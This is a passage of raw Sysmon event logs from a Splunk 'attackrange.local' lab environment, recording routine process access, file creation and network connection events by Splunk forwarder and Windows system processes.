Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2BDD27F3F32CD05F4AFA9C8F1B9C6B2,SHA256=31049A2091D4C3D30F6C273F4D7C8144C910399933ABE70720E22012C0E12C58,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809642Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.459{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F750-60EB-C679-00000000D001}4084C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809641Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.459{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809640Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.459{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809639Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.459{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809638Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.459{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809637Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.459{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809636Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.459{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809635Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.459{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809634Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.459{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809633Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.459{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809632Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.459{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F750-60EB-C679-00000000D001}4084C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809631Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.443{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F750-60EB-C679-00000000D001}4084C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809630Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.444{0C1E0330-F750-60EB-C679-00000000D001}4084C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809629Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.131{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ECB3E9F22C68F43522114C41933D043B,SHA256=E59FE10CB7F284170C5202FC03B86AB6F39C9BB750C2E68E6B3970E8CB06895C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809646Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.389{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57408-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809645Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:29.787{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=828D1460348B38981E33A9FB2046C140,SHA256=93347B5669DE2649726C2C5E9D16AAD0D06676DD13EA9A7BC0EB99B9C285951C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053074Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:29.384{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80C63BD40C021FD130747853C19F584A,SHA256=3289558BFD19C6B62D62CCFD7C575C738875E1B4EBC55FB7BEC56F90AD0EC08C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809644Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:29.459{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EA018E26015F91ADBB3FEBD6C8E77863,SHA256=58A913D20964CAFB78D76BEC42771440FE7B32A071D6031E657A92612F62EC05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809648Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:30.818{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B01BF5411195269F8D72CC388FA0421C,SHA256=3E8D12C913FB828CF5642906BB4C064186D0F4BAB663127AC3B3602B43BB87F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053076Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:30.419{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4235F2B5D18615135A879A7B35F45192,SHA256=8EB39976B00DE42FE4A4A4EE5BF3053A40CB79C4BC9FC3ABF6E9D2BD0A7BC58B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809647Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:30.178{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=B73DF2774998FEB694BB63D196932C30,SHA256=2869AA420A724E8D73B5CE9E7297A4C2C034624E37E8E2E02D5FD129CA48A732,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053075Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:22.735{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61902-false10.0.1.12-8000- 23542300x8000000000000000809649Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:31.896{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57D77050E49214CE4D40F504D15A672D,SHA256=BAAE6C587C9D7E5A5528A70B9F4F1C49199A2F855B13B79A845D94C424EB0C46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053077Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:31.433{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDC7551F9AC0FF0D57C45C358D41A405,SHA256=AD59BE962CB73088260882D2194486E6AAD7AB04F29323943FCFA525545D657E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809650Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:32.896{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E413F079ECB0DBCACFC090159DF4DD8,SHA256=0776A4B35220F294FD3E1B605B14D1E36D77824ABD66A50D464C46BCC881D736,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053080Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:32.448{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=671E44AE0388544AAB583861BE709C0F,SHA256=5DC040145F95519A8FB0A59B4FE70A1238E9075A67CC294B9AA98827CB313108,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053079Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:32.217{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053078Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:32.217{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809651Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:33.928{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17E5AC60D8F8912F6270D194AB0C78DC,SHA256=84F599ABC0D8A9C8D620525CC4E7ABBF63B843A30730628F8D8CE56D788FC901,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053081Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:33.463{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=226AF6FE7ED06B9DC8BCA67EE3FB65D7,SHA256=1D10A210B49C2049DEFB5910086810CEFED694384DCC145D69DB5E4BCB89390B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809652Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:34.932{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6AA66FC20798E7C44DB258BC5B854B0,SHA256=4BCB6BBDEE84A073279E3C2497E8C516E2DF3DCB0D1D1AE0EAA4186E05EB0891,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053082Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:34.464{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2AC566CD64BE6CA1BAD9644BBBADCC2,SHA256=0A2384046DA57454D0BD155853E9D48B43687DCB17454E736731F4D5F812F216,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809654Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:35.932{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2B1041D8791A314E9ABB2EFF5557BD1,SHA256=DFFC2DD755E3B690C077146D83AE92AAD9BCFFD3A5C8C424F0A43DF5E40218C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053083Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:35.464{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9C557C1B8C4E4BD89E02DFCFB1B096B,SHA256=39447A45F630A21CBFF28E07EFD4D900BA5511AA09B756E24E9367A71F4B4B5F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809653Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:33.325{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57409-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809655Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:36.947{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D502360AC859AE9BCD758C1791E6860B,SHA256=A87F57632398B2A4875BB797C6E73986644F2AB2BE1E28C41DCFE1592C551B73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053084Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:36.465{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C65EAC4BCB75BCABCFC7D186CCFD5C2,SHA256=DDC92B9DDCAFEADB13D662F212512741B302EB2A3E96768FA619B52C12A0AF07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809656Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:37.963{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 